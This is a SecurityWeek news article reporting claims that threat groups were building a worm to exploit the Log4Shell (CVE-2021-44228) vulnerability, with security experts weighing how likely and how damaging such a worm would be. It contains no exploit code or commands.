Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Threat Groups Reportedly Working on Log4Shell Worm

Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability.

Log4Shell worm

Experts Comment on Concerns Related to Log4Shell Worm

Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability, but many experts say that — if such a worm is created — it may not be as bad as it sounds.

It recently came to light that the widely used Log4j logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including profit-driven cybercriminals and state-sponsored groups. The vulnerability is tracked as CVE-2021-44228 and it has been dubbed Log4Shell and LogJam.

According to researcher Greg Linares, at least three groups — ones that have been linked to Eastern Europe, Russia and China — are looking into creating a Log4Shell worm, mostly for financially-motivated attacks that involve extortion or selling access to compromised hosts to ransomware groups.

Linares said on December 13 that he had seen evidence suggesting that a worm would be developed in the next 24 to 48 hours, but there are currently no confirmed reports of such a worm spreading in the wild.

While the researcher’s claims have led to concerns that we might see another significant attack, such as in the case of WannaCry or NotPetya, several experts pointed out that a Log4j worm is not easy to develop and it might not even be a priority for malicious actors.

Comments on Log4Shell worm

“I think the fears of a worm are overblown,” said researcher Marcus Hutchins, who in 2017 found a way to disrupt the WannaCry attack. “Firstly, there’s already mass exploitation (you can spray the entire internet from one server). Secondly, worms take time and skill to develop, but most attackers are racing against the clock (patching and other attackers).”

“Also, due to the nature of the exploit there’s no standard way to exploit it. People have [resorted] to crudely stuffing the payload into HTTP requests, which you don’t need a worm to do. A worm would need a novel exploitation technique to gain any real value over scanning,” the researcher added.

Advertisement. Scroll to continue reading.

Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, agrees that developing this type of malware takes a significant amount of time and effort, and there “hasn’t been any evidence to suggest this is a priority for threat actors at this time.”

“This activity differs from the Wannacry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue. It’s still very much early days with regards to Log4j. While many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm,” Morgan said.

John Bambenek, principal threat hunter at Netenrich, pointed out that a worm would have posed a bigger risk when the vulnerability was disclosed, but at this point — while there likely still are many vulnerable devices out there — many affected systems have already been patched or are protected by WAF rules.

Jake Williams, co-founder and CTO at BreachQuest, noted, “The vast majority of servers vulnerable to Log4Shell will be running the vulnerable process with very limited permissions. In most cases, a worm exploiting Log4Shell would probably not be able to achieve persistence across process restarts. Additionally, because the process probably doesn’t have filesystem permissions, we should be less worried about ransomware payloads. A malicious process can’t encrypt what it can’t write in the first place.”

“While we should absolutely expect a Log4Shell worm to be created, we shouldn’t conflate the expected damage of a worm with what has been seen in previous high profile worms,” Williams added.

Yaniv Balmas, VP of security research at Salt Security, believes a wormable exploit is “definitely a valid scenario” and it’s very likely that someone will embed the Log4Shell vulnerability into a worm that “will be almost impossible to stop once it reaches a critical mass.”

However, the expert pointed out that malicious actors don’t currently need a worm to easily launch Log4Shell attacks against millions of online services, and the extent of the damage could be even higher than in the case of a worm, which is automated and works “blindly.”

Casey Ellis, founder and CTO at Bugcrowd, also commented, pointing out, “While it can be argued that malicious attackers have more than ample opportunity to achieve their goals with Log4Shell without engineering a self-propagation mechanism, there is also a ‘hobbyist’ motivation around worming the exploit. Historically, many of the worms that were most impactful on the Internet were research projects which ended up being unexpectedly successful.”

Related: Log4Shell Tools and Resources for Defenders – Continuously Updated

Related: Industrial Organizations Targeted in Log4Shell Attacks

Related: Problematic Log4j Functionality Disabled as More Security Issues Come to Light

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Data Protection

The cryptopocalypse is the point at which quantum computing becomes powerful enough to use Shor’s algorithm to crack PKI encryption.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.